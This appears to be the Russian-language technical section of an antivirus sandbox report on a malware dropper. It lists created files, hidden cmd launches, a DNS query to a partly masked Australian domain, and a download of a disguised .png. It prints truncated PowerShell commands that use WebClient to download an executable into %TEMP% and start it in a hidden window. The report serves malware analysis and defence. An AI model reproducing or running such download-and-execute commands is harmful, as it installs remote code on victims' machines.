Техническая информация
- $yyexjjr9 как %temp%\mg_jrz5.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function luzjeplrn([String] $Yyexjjr9){(New-Object System.Net.WebClient).DownloadFile($Yyexjjr9,''%TEMP%\Mg_jrz5.exe'');Start-Process ''%TEMP%\Mg_jrz5.exe'';}try{lu...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1944
- %TEMP%\xcg1.bat
- %TEMP%\853512.cvr
- 'su#####apital.com.au':80
- http://su#####apital.com.au/ser1812.png
- DNS ASK su#####apital.com.au
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function luzjeplrn([String] $Yyexjjr9){(New-Object System.Net.WebClient).DownloadFile($Yyexjjr9,''%TEMP%\Mg_jrz5.exe'');Start-Process ''%TEMP%\Mg_jrz5.exe'';}try{lu...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Xcg1.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Xcg1.bat" "